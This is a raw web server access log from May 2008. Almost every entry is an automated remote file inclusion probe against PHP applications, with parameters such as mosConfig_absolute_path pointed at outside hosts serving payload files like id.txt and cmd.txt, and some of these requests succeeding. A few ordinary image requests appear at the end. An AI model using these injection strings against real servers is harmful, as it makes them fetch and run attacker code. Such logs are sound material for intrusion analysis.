91.194.90.180 - - [02/May/2008:09:56:47 -0700] "GET /logs/access_080226.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.190.243.228 - - [02/May/2008:09:56:48 -0700] "GET /logs/access_071225.log//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.190.243.228 - - [02/May/2008:09:56:49 -0700] "GET //includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.218.85.18 - - [02/May/2008:09:56:49 -0700] "GET /logs/access_080205.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.190.243.228 - - [02/May/2008:09:56:49 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.190.243.228 - - [02/May/2008:09:56:50 -0700] "GET /logs/access_080116.log//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.114.133.27 - - [02/May/2008:09:56:50 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.insertcoinhere.de//language/lang_english/.../contr.txt?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
85.114.133.27 - - [02/May/2008:09:56:50 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.insertcoinhere.de//language/lang_english/.../contr.txt?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
140.113.4.81 - - [02/May/2008:09:56:54 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [02/May/2008:09:56:55 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 200 50 "-" "libwww-perl/5.65" "www.dmulk.com"
195.155.232.37 - - [02/May/2008:09:56:57 -0700] "GET /logs/access_080228.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.189.203.8 - - [02/May/2008:09:57:01 -0700] "GET /logs/access_071225.log//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.189.203.8 - - [02/May/2008:09:57:01 -0700] "GET //includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.189.203.8 - - [02/May/2008:09:57:02 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.121.128.18 - - [02/May/2008:09:57:02 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.155.232.37 - - [02/May/2008:09:57:02 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
195.189.203.8 - - [02/May/2008:09:57:02 -0700] "GET /logs/access_080116.log//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [02/May/2008:09:57:05 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.121.128.18 - - [02/May/2008:09:57:06 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.65" "www.dmulk.com"
217.149.245.109 - - [02/May/2008:09:57:20 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:09:57:20 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.149.245.109 - - [02/May/2008:09:57:20 -0700] "GET //includes/kb_constants.php?module_root_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:09:57:30 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.152.14 - - [02/May/2008:09:57:36 -0700] "GET /logs/access_080224.log/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.khalilshahr.com/templates/%20%20%20%20%20%20%20/sistem%20/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.152.14 - - [02/May/2008:09:57:36 -0700] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.khalilshahr.com/templates/%20%20%20%20%20%20%20/sistem%20/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.152.14 - - [02/May/2008:09:57:37 -0700] "GET /logs/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.khalilshahr.com/templates/%20%20%20%20%20%20%20/sistem%20/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.155.232.37 - - [02/May/2008:09:57:48 -0700] "GET /logs/access_080219.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:09:58:08 -0700] "GET /logs/index.php?pag=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.155.232.37 - - [02/May/2008:09:58:11 -0700] "GET /logs/access_080228.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:09:58:17 -0700] "GET /index.php?pag=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.89.97 - - [02/May/2008:09:58:27 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
193.254.184.125 - - [02/May/2008:09:58:28 -0700] "GET /logs/access_071225.log//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
193.254.184.125 - - [02/May/2008:09:58:29 -0700] "GET //includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
193.254.184.125 - - [02/May/2008:09:58:29 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
72.29.89.97 - - [02/May/2008:09:58:29 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 200 50 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
193.254.184.125 - - [02/May/2008:09:58:30 -0700] "GET /logs/access_080116.log//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
72.29.90.83 - - [02/May/2008:09:58:37 -0700] "GET /IShttp://www.shenprofessional.de/faq/attachments/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
72.29.90.83 - - [02/May/2008:09:58:37 -0700] "GET /logs/IShttp://www.shenprofessional.de/faq/attachments/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:09:58:44 -0700] "GET /logs/index.php?incl=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.153.72 - - [02/May/2008:09:58:44 -0700] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:09:58:47 -0700] "GET /index.php?incl=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
91.121.1.47 - - [02/May/2008:09:58:49 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.1.47 - - [02/May/2008:09:58:49 -0700] "GET //includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:58:55 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:58:55 -0700] "GET //includes/kb_constants.php?module_root_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.122.1.59 - - [02/May/2008:09:58:57 -0700] "GET /logs/access_080222.log/solpot.html?body=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.17.153.72 - - [02/May/2008:09:58:59 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
91.121.1.47 - - [02/May/2008:09:59:00 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.1.47 - - [02/May/2008:09:59:00 -0700] "GET //includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.182.225.143 - - [02/May/2008:09:59:07 -0700] "GET /logs/access_080215.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.182.225.143 - - [02/May/2008:09:59:08 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.1.47 - - [02/May/2008:09:59:13 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.1.47 - - [02/May/2008:09:59:13 -0700] "GET //includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:09:59:22 -0700] "GET /logs/access_080228.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.153.72 - - [02/May/2008:09:59:24 -0700] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
85.17.153.72 - - [02/May/2008:09:59:24 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
85.25.152.14 - - [02/May/2008:09:59:34 -0700] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.khalilshahr.com/templates/%20%20%20%20%20%20%20/sistem%20/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.153.72 - - [02/May/2008:09:59:43 -0700] "GET /logs//cutenews/inc/shows.inc.php?cutepath=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
91.121.1.47 - - [02/May/2008:10:00:03 -0700] "GET //includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.1.47 - - [02/May/2008:10:00:04 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.1.47 - - [02/May/2008:10:00:04 -0700] "GET /logs/access_080116.log//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.1.47 - - [02/May/2008:10:00:05 -0700] "GET //includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.1.47 - - [02/May/2008:10:00:05 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.1.47 - - [02/May/2008:10:00:08 -0700] "GET /logs/access_080116.log//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.1.47 - - [02/May/2008:10:00:08 -0700] "GET //includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.1.47 - - [02/May/2008:10:00:09 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.106.244.146 - - [02/May/2008:10:00:09 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.153.72 - - [02/May/2008:10:00:11 -0700] "GET //cutenews/inc/shows.inc.php?cutepath=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
89.106.244.146 - - [02/May/2008:10:00:13 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
195.155.232.37 - - [02/May/2008:10:00:20 -0700] "GET /logs/access_080226.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.1.46 - - [02/May/2008:10:00:24 -0700] "GET /logs/access_080116.log//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.1.46 - - [02/May/2008:10:00:24 -0700] "GET //includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.1.46 - - [02/May/2008:10:00:25 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.155.232.37 - - [02/May/2008:10:00:26 -0700] "GET /logs/access_080117.log//sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.153.72 - - [02/May/2008:10:00:48 -0700] "GET //includes/kb_constants.php?module_root_path=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
66.7.207.158 - - [02/May/2008:10:00:50 -0700] "GET /logs/access_080116.log//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.7.207.158 - - [02/May/2008:10:00:50 -0700] "GET //includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.121.1.47 - - [02/May/2008:10:00:50 -0700] "GET /logs/access_071225.log//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.207.158 - - [02/May/2008:10:00:50 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.215.27.158 - - [02/May/2008:10:00:50 -0700] "GET /logs/access.log//modules/My_eGallery/index.php?basepath=http://users.volja.net/kcukd/60.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.215.27.158 - - [02/May/2008:10:00:50 -0700] "GET //modules/My_eGallery/index.php?basepath=http://users.volja.net/kcukd/60.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.121.1.47 - - [02/May/2008:10:00:50 -0700] "GET /logs/access_071225.log//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.215.27.158 - - [02/May/2008:10:00:50 -0700] "GET /logs//modules/My_eGallery/index.php?basepath=http://users.volja.net/kcukd/60.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.121.1.47 - - [02/May/2008:10:00:55 -0700] "GET /logs/access_071225.log//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.70.234.195 - - [02/May/2008:10:01:01 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
194.70.234.195 - - [02/May/2008:10:01:01 -0700] "GET //includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.196.43.133 - - [02/May/2008:10:01:04 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.218.85.18 - - [02/May/2008:10:01:04 -0700] "GET /logs/access_080304.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.vspbilgisayar.com/fuckrox-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [02/May/2008:10:01:05 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.vspbilgisayar.com/fuckrox-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [02/May/2008:10:01:05 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.vspbilgisayar.com/fuckrox-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.196.43.133 - - [02/May/2008:10:01:07 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.812" "www.dmulk.com"
87.106.1.46 - - [02/May/2008:10:01:09 -0700] "GET /logs/access_071225.log//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.70.234.195 - - [02/May/2008:10:01:14 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
194.70.234.195 - - [02/May/2008:10:01:14 -0700] "GET //includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.17.153.72 - - [02/May/2008:10:01:18 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:10:01:21 -0700] "GET /logs/access_080116.log//includes/kb_constants.php?module_root_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:10:01:21 -0700] "GET //includes/kb_constants.php?module_root_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:10:01:21 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
62.141.56.138 - - [02/May/2008:10:01:21 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.138 - - [02/May/2008:10:01:22 -0700] "GET //includes/kb_constants.php?module_root_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
194.70.234.195 - - [02/May/2008:10:01:22 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
194.70.234.195 - - [02/May/2008:10:01:22 -0700] "GET //includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
194.70.234.217 - - [02/May/2008:10:01:26 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
194.70.234.217 - - [02/May/2008:10:01:26 -0700] "GET //includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.25.152.14 - - [02/May/2008:10:01:31 -0700] "GET /logs/access_080308.log/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.khalilshahr.com/templates/%20%20%20%20%20%20%20/sistem%20/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:10:01:36 -0700] "GET /logs/access_071225.log//includes/kb_constants.php?module_root_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:10:01:42 -0700] "GET /logs/access_071225.log//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:10:01:42 -0700] "GET //includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:10:01:42 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
68.219.254.82 - - [02/May/2008:10:01:42 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4360M.JPG HTTP/1.1" 200 108624 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
68.219.254.82 - - [02/May/2008:10:01:42 -0700] "GET /bikes/dteel/2008_01_26/IMG_4356M.JPG HTTP/1.1" 200 85422 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
68.219.254.82 - - [02/May/2008:10:01:42 -0700] "GET /bikes/dteel/2008_01_26/IMG_4349M.JPG HTTP/1.1" 200 73896 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
68.219.254.82 - - [02/May/2008:10:01:43 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4365M.JPG HTTP/1.1" 200 105802 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
198.106.204.216 - - [02/May/2008:10:01:43 -0700] "GET /logs/access_080116.log//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
68.219.254.82 - - [02/May/2008:10:01:43 -0700] "GET /bikes/dteel/2008_01_26/IMG_4338M.JPG HTTP/1.1" 200 76584 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
68.219.254.82 - - [02/May/2008:10:01:43 -0700] "GET /bikes/dteel/2008_01_26/IMG_4347M.JPG HTTP/1.1" 200 93210 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
